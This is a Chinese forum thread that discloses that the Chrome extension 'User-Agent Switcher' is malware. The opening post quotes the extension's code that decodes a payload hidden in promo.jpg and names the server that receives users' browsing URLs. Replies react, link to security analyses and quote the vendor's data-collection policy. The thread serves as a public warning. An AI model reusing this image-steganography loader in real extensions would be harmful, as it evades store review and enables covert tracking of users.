大家注意了 Chrome 的插件 User-Agent Switcher 是个木马
anoymoux · 2017-09-09 06:27:10 +08:00 · 54517 次点击这是一个创建于 2631 天前的主题,其中的信息可能已经有所发展或是发生改变。
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...
https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
if ("" === '../promo.jpg') return "";
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
 |
101
chanssl 2017-09-10 20:09:20 +08:00
日狗了,竟然是恶意程序,中奖了
|
 |
102
Bailang 2017-09-10 21:15:38 +08:00
|
 |
103
chroming 2017-09-10 22:54:44 +08:00
突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719
|
|
104
Bailang 2017-09-11 09:52:04 +08:00
转载 侵删
https://x.threatbook.cn/article?threatInfoID=113 有人贴出了这个 policy Collected Information. Accessing and Using the Services. When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users. |
 |
105
nyanyh 2017-09-11 11:52:12 +08:00
@acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的
|
 |
107
cyg07 2017-09-20 19:10:53 +08:00
@redsonic @anoymoux @xssnull
360CERT 的具体分析 "Chrome 插件 User – Agent Switcher 恶意代码分析报告 " http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw |
 |
108
ariza 2017-09-22 10:23:32 +08:00
为毛依然屹立不倒。。
|
 |
110
lyragosa 2017-10-18 23:32:49 +08:00
我似乎就是这个插件……吓得我赶紧删掉了
|
 |
112
legege007 2020-09-05 20:48:27 +08:00
已下架了
|
Select Language